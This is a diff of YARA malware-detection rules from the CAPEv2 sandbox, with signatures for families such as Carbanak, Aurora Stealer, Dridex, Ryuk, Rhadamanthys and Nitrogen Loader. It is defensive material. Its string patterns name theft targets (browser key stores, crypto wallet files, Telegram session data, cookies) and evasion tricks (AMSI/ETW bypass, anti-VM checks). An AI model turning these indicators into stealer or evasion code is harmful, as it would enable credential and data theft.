+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "0461c7fd14c74646437654f0a63a4a89d4efad620e197a8ca1e8d390618842c3"
 		score = 75
 		quality = 70
-		tags = ""
-		cape_type = "Rozena Payload"
+		tags = "FILE"
+		cape_type = "TSCookie Payload"
 
 	strings:
-		$ip_port = {FF D5 6A 0A 68 [4] 68 [4] 89 E6 50 50 50 50 40 50 40 50 68 [4] FF D5}
-		$socket = {6A 00 6A 04 56 57 68 [4] FF D5 [0-5] 8B 36 6A 40 68 00 10 00 00 56 6A 00 68}
+		$string1 = "http://%s:%d" wide
+		$string2 = "/Default.aspx" wide
+		$string3 = "\\wship6"
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule CAPE_Varenyky : FILE
+rule CAPE_Carbanak : FILE
 {
 	meta:
-		description = "Varenyky Payload"
-		author = "kevoreilly"
-		id = "e01695fa-72a0-5d8e-86ab-8c909d28b8ec"
-		date = "2019-10-30"
-		modified = "2019-10-30"
+		description = "Carnbanak Payload"
+		author = "enzok"
+		id = "e6d395d5-65ba-5efb-bcbc-c6d56a96f0c1"
+		date = "2023-11-30"
+		modified = "2024-03-18"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/Varenyky.yar#L1-L11"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "602f1b8b60b29565eabe2171fde4eb58546af68f8acecad402a7a51ea9a08ed9"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/Carbanak.yar#L1-L14"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		hash = "c9c1b06cb9c9bd6fc4451f5e2847a1f9524bb2870d7bb6f0ee09b9dd4e3e4c84"
+		logic_hash = "8ed5ab07f1635dc7cdf296e86a71a0a99d0b2faef8fc460f43d426b24b8c8367"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "Varenyky Payload"
+		cape_type = "Carbanak Payload"
 
 	strings:
-		$onion = "jg4rli4xoagvvmw47fr2bnnfu7t2epj6owrgyoee7daoh4gxvbt3bhyd.onion"
+		$sboxinit = {0F BE 02 4? 8D 05 [-] 4? 8D 4D ?? E8 [3] 00 33 F6 4? 8D 5D ?? 4? 63 F8 8B 45 ?? B? B1 E3 14 06}
+		$decode_string = {0F BE 03 FF C9 83 F8 20 7D ?? B? 1F [3] 4? 8D 4A E2 EB ?? 3D 80 [3] 7D ?? B? 7F [3] 4? 8D 4A A1 EB ?? B? FF [3] 4? 8D 4A 81}
+		$constants = {0F B7 05 [3] 00 0F B7 1D [3] 00 83 25 [3] 00 00 89 05 [3] 00 0F B7 05 [3] 00 89 1D [3] 00 89 05 [3] 00 33 C0 4? 8D 4D}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $onion )
+		uint16( 0 ) == 0x5A4D and 2 of them
 }
-rule CAPE_Vipkeylogger : FILE
+rule CAPE_Chaosbot : FILE
 {
 	meta:
-		description = "Detects VIPKeyLogger Keylogger"
+		description = "No description has been set in the source file - CAPE"
+		author = "YungBinary"
+		id = "3c8ce71c-2a92-5ca9-9b33-c7059d47f4ca"
+		date = "2025-10-16"
+		modified = "2025-10-16"
+		reference = "https://x.com/YungBinary/status/1976580501508182269"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/ChaosBot.yar#L1-L24"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "fcb04697dbef62497421318d5dfe7cdf5533b432975ebbfb3bd64ebbfeb4a592"
+		score = 75
+		quality = 62
+		tags = "FILE"
+		cape_type = "ChaosBot Payload"
+
+	strings:
+		$s1 = { 48 6f 73 74 20 20 63 6f 6e 6e 65 63 74 65 64 2c 20 63 68 61 6e 6e 65 6c 20 63 72 65 61 74 65 64 3a 20 3c }
+		$s2 = { 73 68 65 6c 6c 20 64 6f 77 6e 6c 6f 61 64 20 63 64 20 46 61 69 6c 65 64 20 74 6f 20 63 68 61 6e 67 65 20 64 69 72 65 63 74 6f 72 79 3a }
+		$s3 = { 56 69 72 74 75 61 6c 50 72 6f 74 65 63 74 41 6d 73 69 53 63 61 6e 42 75 66 66 65 72 45 74 77 45 76 65 6e 74 57 72 69 74 65 43 4f 4d 50 55 54 45 52 4e 41 4d 45 }
+		$s4 = { 43 3a 5c 55 73 65 72 73 5c 50 75 62 6c 69 63 5c 6d 65 73 73 61 67 65 5f 2e 74 78 74 }
+		$bypass = {
+            74 ??
+            66 C7 03 31 C0
+            C6 43 02 C3
+        }
+		$antivm = {
+            48 ?? 30 30 3A 30 43 3A 32 39
+            49 39 ?? 00
+        }
+
+	condition:
+		uint16( 0 ) == 0x5a4d and ( 1 of ( $s* ) or ( $antivm and $bypass ) )
+}
+rule CAPE_Dridexloader_1 : FILE
+{
+	meta:
+		description = "Dridex v4 dropper C2 parsing function"
 		author = "kevoreilly"
-		id = "71606fcc-89b4-519a-833a-b6cb4b569cb8"
-		date = "2025-09-11"
-		modified = "2025-09-11"
+		id = "43bd9631-4611-567c-bee5-d926e060b977"
+		date = "2019-11-12"
+		modified = "2021-03-10"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/VIPKeyLogger.yar#L1-L14"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "b9dba7562bba4807c0789692d44650996e62c8d0c4031dedd65773877621b1de"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/DridexLoader.yar#L1-L17"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "20696b1f14539c8ecf21bffc696596040c20b1ee2fcedc173945482c0baca588"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "VIPKeyLogger Payload"
-		packed = "edaba79c3d43a416a86003f336d879ed3a513aa24dd401340584615647ed6da2"
+		cape_type = "DridexLoader Payload"
 
 	strings:
-		$s1 = "/ VIP Recovery \\" wide
-		$s2 = "Clipboard Logs ID" wide
-		$s3 = "Keylogger" wide
+		$c2parse_1 = {57 0F 95 C0 89 35 [4] 88 46 04 33 FF 80 3D [4] 00 76 54 8B 04 FD [4] 8D 4D EC 83 65 F4 00 89 45 EC 66 8B 04 FD [4] 66 89 45 F0 8D 45 F8 50}
+		$c2parse_2 = {89 45 00 0F B7 53 04 89 10 0F B6 4B 0C 83 F9 0A 7F 03 8A 53 0C 0F B6 53 0C 85 D2 7E B7 8D 74 24 0C C7 44 24 08 00 00 00 00 8D 04 7F 8D 8C 00}
+		$c2parse_3 = {89 08 66 39 1D [4] A1 [4] 0F 95 C1 88 48 04 80 3D [4] 0A 77 05 A0 [4] 80 3D [4] 00 56 8B F3 76 4E 66 8B 04 F5}
+		$c2parse_4 = {0F B7 C0 89 01 A0 [4] 3C 0A 77 ?? A0 [4] A0 [4] 57 33 FF 84 C0 74 ?? 56 BE}
+		$c2parse_5 = {0F B7 05 [4] 89 02 89 15 [4] 0F B6 15 [4] 83 FA 0A 7F 07 0F B6 05 [4] 0F B6 05 [4] 85 C0}
+		$c2parse_6 = {0F B7 53 ?? 89 10 0F B6 4B ?? 83 F9 0A 7F 03 8A 53 ?? 0F B6 53 ?? 85 D2 7E B9}
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5A4D and any of them
 }
-rule CAPE_Vidar : FILE
+rule CAPE_Aurorastealer : FILE
 {
 	meta:
-		description = "Vidar Payload"
-		author = "kevoreilly,rony"
-		id = "9e4e797f-880e-54eb-ad44-caad0ec5683c"
-		date = "2019-10-30"
-		modified = "2023-04-21"
+		description = "detects Aurora Stealer samples"
+		author = "Johannes Bader @viql"
+		id = "07779318-3e5d-5e67-8c04-f3f70d7e48b7"
+		date = "2022-12-14"
+		modified = "2023-03-31"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/Vidar.yar#L1-L22"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "5d4c030536ed41cf4e0dcb77b2fe4553d789ee2b8095a4b3e050692335a8709d"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/AuroraStealer.yar#L1-L74"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "0d10e9268184f494a73d5b4ab0d9a478ad0c26d2ef13d5134f8c9769f028b8f5"
 		score = 75
-		quality = 70
+		quality = 45
 		tags = "FILE"
-		cape_type = "Vidar Payload"
-		packed = "0cff8404e73906f3a4932e145bf57fae7a0e66a7d7952416161a5d9bb9752fd8"
+		version = "v1.0"
+		tlp = "TLP:WHITE"
+		malpedia_family = "win.aurora_stealer"
+		hash1_md5 = "51c153501e991f6ce4901e6d9578d0c8"
+		hash1_sha1 = "3816f17052b28603855bde3e57db77a8455bdea4"
+		hash1_sha256 = "c148c449e1f6c4c53a7278090453d935d1ab71c3e8b69511f98993b6057f612d"
+		hash2_md5 = "65692e1d5b98225dbfb1b6b2b8935689"
+		hash2_sha1 = "0b51765c175954c9e47c39309e020bcb0f90b783"
+		hash2_sha256 = "5a42aa4fc8180c7489ce54d7a43f19d49136bd15ed7decf81f6e9e638bdaee2b"
+		cape_type = "AuroraStealer Payload"
 
 	strings:
-		$decode = {FF 75 0C 8D 34 1F FF 15 ?? ?? ?? ?? 8B C8 33 D2 8B C7 F7 F1 8B 45 0C 8B 4D 08 8A 04 02 32 04 31 47 88 06 3B 7D 10 72 D8}
-		$xor_dec = {0F B6 [0-5] C1 E? ?? 33 ?? 81 E? [0-5] 89 ?? 7C AF 06}
-		$wallet = "*wallet*.dat" fullword ascii wide
-		$s1 = "\"os_crypt\":{\"encrypted_key\":\"" fullword ascii wide
-		$s2 = "screenshot.jpg" fullword ascii wide
-		$s3 = "\\Local State" fullword ascii wide
-		$s4 = "Content-Disposition: form-data; name=\"" fullword ascii wide
-		$s5 = "CC\\%s_%s.txt" fullword ascii wide
-		$s6 = "History\\%s_%s.txt" fullword ascii wide
-		$s7 = "Autofill\\%s_%s.txt" fullword ascii wide
-		$s8 = "Downloads\\%s_%s.txt" fullword ascii wide
+		$str_func_01 = "main.(*DATA_BLOB).ToByteArray"
+		$str_func_02 = "main.Base64Encode"
+		$str_func_03 = "main.Capture"
+		$str_func_04 = "main.CaptureRect"
+		$str_func_05 = "main.ConnectToServer"
+		$str_func_06 = "main.CreateImage"
+		$str_func_07 = "main.FileExsist"
+		$str_func_08 = "main.GetDisplayBounds"
+		$str_func_09 = "main.GetInfoUser"
+		$str_func_10 = "main.GetOS"
+		$str_func_11 = "main.Grab"
+		$str_func_12 = "main.MachineID"
+		$str_func_13 = "main.NewBlob"
+		$str_func_14 = "main.NumActiveDisplays"
+		$str_func_15 = "main.PathTrans"
+		$str_func_16 = "main.SendToServer_NEW"
+		$str_func_17 = "main.SetUsermame"
+		$str_func_18 = "main.Zip"
+		$str_func_19 = "main.base64Decode"
+		$str_func_20 = "main.countupMonitorCallback"
+		$str_func_21 = "main.enumDisplayMonitors"
+		$str_func_22 = "main.getCPU"
+		$str_func_23 = "main.getDesktopWindow"
+		$str_func_24 = "main.getGPU"
+		$str_func_25 = "main.getMasterKey"
+		$str_func_26 = "main.getMonitorBoundsCallback"
+		$str_func_27 = "main.getMonitorRealSize"
+		$str_func_28 = "main.sysTotalMemory"
+		$str_func_29 = "main.xDecrypt"
+		$str_type_01 = "type..eq.main.Browser_G"
+		$str_type_02 = "type..eq.main.STRUSER"
+		$str_type_03 = "type..eq.main.Telegram_G"
+		$str_type_04 = "type..eq.main.Crypto_G"
+		$str_type_05 = "type..eq.main.ScreenShot_G"
+		$str_type_06 = "type..eq.main.FileGrabber_G"
+		$str_type_07 = "type..eq.main.FTP_G"
+		$str_type_08 = "type..eq.main.Steam_G"
+		$str_type_09 = "type..eq.main.DATA_BLOB"
+		$str_type_10 = "type..eq.main.Grabber"
+		$varia_01 = "\\User Data\\Local State"
+		$varia_02 = "\\\\Opera Stable\\\\Local State"
+		$varia_03 = "Reconnect 1"
+		$varia_04 = "@ftmone"
+		$varia_05 = "^user^"
+		$varia_06 = "wmic path win32_VideoController get name"
+		$varia_07 = "\\AppData\\Roaming\\Telegram Desktop\\tdata"
+		$varia_08 = "C:\\Windows.old\\Users\\"
+		$varia_09 = "ScreenShot"
+		$varia_10 = "Crypto"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and 6 of them
+		uint16( 0 ) == 0x5A4D and ( 32 of ( $str_* ) or 9 of ( $varia_* ) )
 }
-rule CAPE_Azer : FILE
+rule CAPE_Nitrobunnydownloader : FILE
 {
 	meta:
-		description = "Azer Payload"
-		author = "kevoreilly"
-		id = "4bda70c2-3cd9-543f-92f4-886b7dd899a1"
-		date = "2019-10-30"
-		modified = "2019-10-30"
+		description = "NitroBunnyDownloader"
+		author = "enzok"
+		id = "64faa91a-4847-57bd-ab71-27029f6074ac"
+		date = "2025-10-28"
+		modified = "2025-11-05"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/Azer.yar#L1-L13"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "48bd4a4e071f10d1911c4173a0cd39c69fed7a3b29eb92beffe709899f4cefa5"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/NitroBunnyDownloader.yar#L1-L18"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		hash = "960e59200ec0a4b5fb3b44e6da763f5fec4092997975140797d4eec491de411b"
+		logic_hash = "dcc1348c1d1af0c854376cf6331538951362b43d8d76c0ad73bbbdeb1ab4c135"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "Azer Payload"
+		cape_type = "NitroBunnyDownloader Payload"
 
 	strings:
-		$a1 = "webmafia@asia.com" wide
-		$a2 = "INTERESTING_INFORMACION_FOR_DECRYPT.TXT" wide
-		$a3 = "MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQ"
+		$config1 = {E8 [3] 00 41 B8 ?? ?? 00 00 48 8D 15 [3] 00 48 89 C1 48 89 ?? E8 [3] 00}
+		$config2 = {E8 [3] 00 48 8D 15 [3] 00 41 B8 ?? ?? 00 00 48 89 C1 48 89 ?? E8 [3] 00}
+		$string1 = "X-Amz-User-Agent:" wide
+		$string2 = "Amz-Security-Flag:" wide
+		$string3 = "/cart" wide
+		$string4 = "Cookie: " wide
+		$string5 = "wishlist" wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $a* ) )
+		uint16( 0 ) == 0x5A4D and 1 of ( $config* ) and 2 of ( $string* )
 }
-rule CAPE_Eternalromance : FILE
+rule CAPE_Ramnit : FILE
 {
 	meta:
-		description = "EternalRomance Exploit"
+		description = "Ramnit Payload"
 		author = "kevoreilly"
-		id = "34035076-9dda-5e32-bd0b-d0257a96329b"
+		id = "6df92055-05f6-5985-9268-b9c85e143567"
 		date = "2019-10-30"
-		modified = "2022-06-09"
+		modified = "2019-10-30"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/EternalRomance.yar#L1-L33"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "5390fae3e2411a715cdc965df8648c0c4c511d53d5f76031714f1b784b58eb0d"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/Ramnit.yar#L1-L13"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "6f661f47bdf8377b0fb96f190fcb964c0ed2b43ce7ae7880f9dfce9e43837efd"
 		score = 75
-		quality = 68
+		quality = 70
 		tags = "FILE"
-		cape_type = "EternalRomance Exploit"
+		cape_type = "Ramnit Payload"
 
 	strings:
-		$SMB1 = "Frag"
-		$SMB2 = "Free"
-		$session7_32_1 = {2A 02 1C 00}
-		$session7_64_1 = {2A 02 28 00}
-		$session8_32_1 = {2A 02 24 00}
-		$session8_64_1 = {2A 02 38 00}
-		$session7_32_2 = {D5 FD E3 FF}
-		$session7_64_2 = {D5 FD D7 FF}
-		$session8_32_2 = {D5 FD DB FF}
-		$session8_64_2 = {D5 FD C7 FF}
-		$ipc = "IPC$"
-		$pipe1 = "atsvc"
-		$pipe2 = "browser"
-		$pipe3 = "eventlog"
-		$pipe4 = "lsarpc"
-		$pipe5 = "netlogon"
-		$pipe6 = "ntsvcs"
-		$pipe7 = "spoolss"
-		$pipe8 = "samr"
-		$pipe9 = "srvsvc"
-		$pipe10 = "scerpc"
-		$pipe11 = "svcctl"
-		$pipe12 = "wkssvc"
+		$DGA = {33 D2 B9 1D F3 01 00 F7 F1 8B C8 B8 A7 41 00 00 F7 E2 8B D1 8B C8 B8 14 0B 00 00 F7 E2 2B C8 33 D2 8B C1 8B}
+		$xor_loop = {83 7D 0C 00 74 27 83 7D 14 00 74 21 8B 4D 0C 8B 7D 08 8B 75 10 BA 00 00 00 00 0B D2 75 04 8B 55 14 4A 8A 1C 32 32 1F 88 1F 47 4A E2 ED}
+		$id_string = "{%08X-%04X-%04X-%04X-%08X%04X}"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $SMB* ) ) and $ipc and ( any of ( $session* ) ) and ( any of ( $pipe* ) )
+		uint16( 0 ) == 0x5A4D and all of ( $* )
 }
-
-rule CAPE_Nighthawk
+rule CAPE_Nitrogenloader
 {
 	meta:
-		description = "NightHawk C2"
-		author = "Nikhil Ashok Hegde <@ka1do9>"
-		id = "096b9d13-6aa7-5b6e-aaeb-e25aa7c8c53f"
-		date = "2022-12-03"
-		modified = "2022-12-05"
+		description = "Nitrogen Loader"
+		author = "enzok"
+		id = "450dc039-c5d5-5d81-945c-def94671825f"
+		date = "2024-10-29"
+		modified = "2025-07-28"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/Nighthawk.yar#L3-L24"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "2d77912678e06503ffef0e8ed84aa4f9ac74357480d57742fbae619acebfb5f2"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/NitrogenLoader.yar#L1-L35"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "4aab353aacc8f6910884e722f2d57439891680963accb906c2cee245437732c6"
 		score = 75
-		quality = 70
+		quality = 68
 		tags = ""
-		cape_type = "Nighthawk Payload"
+		cape_type = "NitrogenLoader Loader"
+		hash1 = "7b603d63a23201ff0b6ffa9acdd650df9caa1731837d559d93b3d8ce1d82a962"
+		hash2 = "50c2afd792bfe2966133ee385054eaae1f73b04e013ef3434ef2407f99d7f037"
+		hash3 = "4926dee7da0da522c34ffeebb32f28703fd689a52543332c8d28ccfea223f43a"
 
 	strings:
-		$keying_methods = { 85 C9 74 43 83 E9 01 74 1C 83 F9 01 0F 85 }
-		$aes_sbox = { 63 7C 77 7B F2 6B 6F C5 30 }
-		$aes_inv_sbox = { 52 09 6A D5 30 36 A5 38 BF }
+		$stringaes1 = {63 7c 77 7b f2 6b 6f c5 30 01 67 2b fe d7 ab 76 ca 82 c9 7d fa}
+		$stringaes2 = {52 09 6a d5 30 36 a5 38 bf 40 a3 9e 81 f3 d7 fb 7c e3 39 82 9b}
+		$string1 = "GetComputerNameExA"
+		$string2 = "LoadResource"
+		$syscallmakehashes = {48 89 4C 24 ?? 48 89 54 24 ?? 4? 89 44 24 ?? 4? 89 4C 24 ?? 4? 83 EC ?? B? [4] E8 [3] 00}
+		$syscallnumber = {49 89 C3 B? [4] E8 [3] 00}
+		$syscall = {48 83 C4 ?? 4? 8B 4C 24 ?? 4? 8B 54 24 ?? 4? 8B 44 24 ?? 4? 8B 4C 24 ?? 4? 89 CA 4? FF E3}
+		$decryptstr1 = {33 D2 48 8B 04 24 B? 0C 00 00 00 48 F7 F1 48 8B C2 48 C1 E0 02 0F B6 C8 48 8B 44 24 ?? 48 D3 E8 48 25 AB 00 00 00}
+		$decryptrsc1 = {48 63 4? 24 ?? 33 D2 48 [0-3] F7 B4 24 [4] 48 8B C2 48 8B 8C 24 [4] 0F BE 04 01}
+		$decryptrsc2 = {8B ?? 24 [1-4] 33 C8 8B C1 48 63 4C 24 ?? 48 8B 94 24 [4] 88 04 0A}
+		$decryptrsc3 = {8B 8C 24 ?? ?? ?? ?? 2B C8 8B C1 48 63 4C 24 ?? 48 8B 94 24 [4] 88 04 0A}
+		$decryptstrs = {33 D2 48 8B 04 24 B9 0C 00 00 00 48 F7 F1 48 8B C2 48 C1 E0 02 0F B6 C8 48 8B 44 24 ?? 48 D3 E8 48 25 AB 00 00 00}
+		$taskman_1 = {E8 [4] B9 61 00 00 00 88 84 24 [4] E8 [4] B9 73 00 00 00 88 84 24 [4] E8 [4] B9 6B 00 00 00 88 84 24 [4] E8 [3] FF}
+		$taskman_2 = {B9 4D 00 00 00 88 84 24 [4] E8 [4] B9 61 00 00 00 88 84 24 [4] E8 [4] B9 6E 00 00 00 88 84 24 [4] E8 [3] FF}
+		$taskman_3 = {B9 61 00 00 00 88 84 24 [4] E8 [4] B9 67 00 00 00 88 84 24 [4] E8 [4] B9 65 00 00 00 88 84 24 [4] E8 [3] FF}
+		$taskman_4 = {B9 72 00 00 00 88 84 24 [4] E8 [4] 31 C9 88 84 24 [4] E8 [3] FF}
+		$installers_1 = {B9 49 00 00 00 E8 [4] B9 6E 00 00 00 88 84 24 [4] E8 [4] B9 73 00 00 00 88 84 24 [4] E8 [3] FF}
+		$installers_2 = {B9 74 00 00 00 88 84 24 [4] E8 [4] B9 61 00 00 00 88 84 24 [4] E8 [4] B9 6C 00 00 00 88 84 24 [4] E8 [3] FF}
+		$installers_3 = {B9 6C 00 00 00 88 84 24 [4] E8 [4] B9 65 00 00 00 88 84 24 [4] E8 [3] FF}
+		$installers_4 = {B9 72 00 00 00 88 84 24 [4] E8 [4] B9 73 00 00 00 88 84 24 [4] E8 [3] FF}
+		$rc4decrypt_1 = {48 89 ?? 4? 89 ?? E8 [4] 4? 8B ?? 24 [1-4] 4? 89 ?? 4? 89 ?? 4? 89 C1 [0-1] 89 ?? E8 [4] 4? 89}
+		$rc4decrypt_2 = {E8 [4] 8B ?? 24 [1-4] 4? 89 ?? 48 89 ?? 4? 89 C1 E8 [3] FF}
 
 	condition:
-		pe.is_pe and for any s in pe.sections : ( s.name == ".profile" ) and all of them
+		(2 of ( $string* ) and any of ( $syscall* ) ) or 4 of ( $decrypt* ) or ( ( 3 of ( $taskman_* ) or 3 of ( $installers* ) ) and all of ( $rc4decrypt_* ) )
 }
-rule CAPE_Rhadamanthys_1
+rule CAPE_Ryuk : FILE
 {
 	meta:
-		description = "Rhadamanthys Payload"
-		author = "kevoreilly, YungBinary"
-		id = "cd34b971-3603-5237-b47f-aea78ca38cac"
-		date = "2023-01-25"
-		modified = "2025-12-19"
+		description = "Ryuk Payload"
+		author = "kevoreilly"
+		id = "594bbb8d-1f85-5a01-a864-ac2d95c45bf9"
+		date = "2019-10-30"
+		modified = "2019-10-30"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/Rhadamanthys.yar#L1-L19"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "3ccfc97202690dd996ffd2b4f09d31e6ee322bf9f0b7759f9b8c455164995f84"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/Ryuk.yar#L1-L14"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "b4463993d8956e402b927a3dcfa2ca9693a959908187f720372f2d3a40e6db0c"
 		score = 75
 		quality = 70
-		tags = ""
-		cape_type = "Rhadamanthys Payload"
+		tags = "FILE"
+		cape_type = "Ryuk Payload"
 
 	strings:
-		$rc4 = {88 4C 01 08 41 81 F9 00 01 00 00 7C F3 89 75 08 33 FF 8B 4D 08 3B 4D 10 72 04 83 65 08 00}
-		$code = {8B 4D FC 3B CF 8B C1 74 0D 83 78 04 02 74 1C 8B 40 1C 3B C7 75 F3 3B CF 8B C1 74 57 83 78 04 17 74 09 8B 40 1C 3B C7 75 F3 EB}
-		$conf_1 = {46 BB FF 00 00 00 23 F3 0F B6 44 31 08 03 F8 23 FB 0F B6 5C 39 08 88 5C 31 08 88 44 39 08 02 C3 8B 5D 08 0F B6 C0 8A 44 08 08}
-		$conf_2 = {0F B6 4F 2A 8D 77 2A 33 C0 6A 03 89 45 F8 89 45 FC 89 45 08 8B C1}
-		$beef = {57 8D 44 33 FC 53 83 C6 FC 50 56 E8 [4] 83 C4 10 66 81 3F EF BE 0F 85}
-		$anti = {50 68 [4] 68 [4] E8 [4] 83 C4 0C A3 [4] 85 C0 74}
-		$dnr = {99 52 50 8D 45 ?? 99 52 50 8B C7 99 52 50 8B C3 99 52 50}
-		$sys = {83 E4 F0 6A 33 E8 00 00 00 00 83 04 24 05 CB}
-		$cape_string = "cape_options"
+		$ext = ".RYK" wide
+		$readme = "RyukReadMe.txt" wide
+		$main = "InvokeMainViaCRT"
+		$code = {48 8B 4D 10 48 8B 03 48 C1 E8 07 C1 E0 04 F7 D0 33 41 08 83 E0 10 31 41 08 48 8B 4D 10 48 8B 03 48 C1 E8 09 C1 E0 03 F7 D0 33 41 08 83 E0 08 31 41 08}
 
 	condition:
-		2 of them and not $cape_string
+		uint16( 0 ) == 0x5A4D and 3 of ( $* )
 }
-rule CAPE_Rhadamanthysloader
+rule CAPE_Masslogger : FILE
 {
 	meta:
-		description = "Rhadamanthys Loader"
+		description = "MassLogger"
 		author = "kevoreilly"
-		id = "0d9955e8-c6e5-50f0-8006-8f6157038d40"
-		date = "2023-01-25"
-		modified = "2025-12-19"
+		id = "0743421a-36f7-5b7c-859f-b461511151cb"
+		date = "2020-10-20"
+		modified = "2020-11-24"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/Rhadamanthys.yar#L21-L33"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "5505c9ba1f0c6cb9aa9c212bf8bc2c49ad544e99996a1f4c1fa79a27a14d4c7f"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/MassLogger.yar#L1-L12"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "c8d82694810aafbdc6a35a661e7431e9536035e2f7fef90b9359064c4209b66c"
 		score = 75
 		quality = 70
-		tags = ""
-		cape_type = "Rhadamanthys Loader"
+		tags = "FILE"
+		cape_type = "MassLogger Payload"
 
 	strings:
-		$ref = {33 D2 B9 0B 00 00 00 F7 F1 B8 01 00 00 00 6B C8 00 8D 84 0D [4] 0F BE 0C 10 8B 95 [4] 03 95 [4] 0F B6 02 33 C1 8B 8D [4] 03 8D [4] 88 01}
-		$ntdll = {B9 6E 00 00 00 66 89 8D [4] BA 74 00 00 00 66 89 95 [4] B8 64 00 00 00 66 89 85 [4] B9 6C 00 00 00 66 89 8D [4] BA 6C 00 00 00 66 89 95}
-		$exit = {6A 00 6A 00 6A 00 6A 00 6A 00 6A 00 8B 95 [4] 52 8B 85 [4] 50 6A 00 68 FF FF 1F 00}
+		$name = "MassLogger"
+		$fody = "Costura"
 
 	condition:
-		2 of them
+		uint16( 0 ) == 0x5A4D and 2 of them
 }
